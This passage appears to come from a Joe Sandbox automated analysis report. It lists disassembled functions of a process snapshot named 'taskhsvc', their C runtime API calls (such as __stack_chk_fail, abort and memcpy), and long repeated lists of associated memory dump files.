    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001DEA55, Relevance: 1.5, APIs: 1, Instructions: 19
    APIs
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 00273787: abort.MSVCRT ref: 002737EC
      • Part of subcall function 00273787: abort.MSVCRT ref: 0027382B
      • Part of subcall function 00273787: abort.MSVCRT ref: 0027387B
      • Part of subcall function 00273787: abort.MSVCRT ref: 0027395E
      • Part of subcall function 00273787: memcpy.MSVCRT ref: 002739F6
      • Part of subcall function 00273787: __stack_chk_fail.LIBSSP-0 ref: 00273AAC
    • __stack_chk_fail.LIBSSP-0 ref: 001DEAB7
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00223734, Relevance: 1.5, APIs: 1, Instructions: 19
    APIs
      • Part of subcall function 002E6A4B: abort.MSVCRT ref: 002E6AAF
      • Part of subcall function 002E6A4B: abort.MSVCRT ref: 002E6B04
      • Part of subcall function 002E6A4B: __stack_chk_fail.LIBSSP-0 ref: 002E6B81
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0022A9F8), ref: 00223769
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00332920, Relevance: 1.5, APIs: 1, Instructions: 19
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0033202E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00313FDC), ref: 00332060
    • __stack_chk_fail.LIBSSP-0 ref: 00332958
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00326573, Relevance: 1.5, APIs: 1, Instructions: 18
    APIs
      • Part of subcall function 00326206: abort.MSVCRT ref: 00326275
      • Part of subcall function 00326206: fclose.MSVCRT ref: 0032628D
      • Part of subcall function 00326206: strerror.MSVCRT ref: 003262A6
      • Part of subcall function 00326206: _close.MSVCRT ref: 00326301
      • Part of subcall function 00326206: strerror.MSVCRT ref: 00326316
      • Part of subcall function 00326206: abort.MSVCRT ref: 003263BD
      • Part of subcall function 00326206: _unlink.MSVCRT ref: 003263D0
      • Part of subcall function 00326206: strerror.MSVCRT ref: 003263EE
      • Part of subcall function 00326206: strcmp.MSVCRT ref: 00326444
      • Part of subcall function 00326206: abort.MSVCRT ref: 00326481
      • Part of subcall function 00326206: strerror.MSVCRT ref: 003264AD
      • Part of subcall function 00326206: free.MSVCRT ref: 00326508
      • Part of subcall function 00326206: free.MSVCRT ref: 00326530
      • Part of subcall function 00326206: free.MSVCRT ref: 00326552
      • Part of subcall function 00326206: __stack_chk_fail.LIBSSP-0 ref: 0032656C
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,002C0EBF), ref: 003265A7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001CAF32, Relevance: 1.5, APIs: 1, Instructions: 17
    APIs
      • Part of subcall function 0031F06F: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF47), ref: 0031F0A7
      • Part of subcall function 001CDB8D: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF51), ref: 001CDC05
      • Part of subcall function 001CEE56: time.MSVCRT ref: 001CEE77
      • Part of subcall function 001CEE56: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C7367), ref: 001CEE98
    • __stack_chk_fail.LIBSSP-0 ref: 001CAF62
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E60BF, Relevance: 1.5, APIs: 1, Instructions: 14
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • __stack_chk_fail.LIBSSP-0 ref: 001E60E6
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C15AB, Relevance: 1.5, APIs: 1, Instructions: 14
    APIs
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
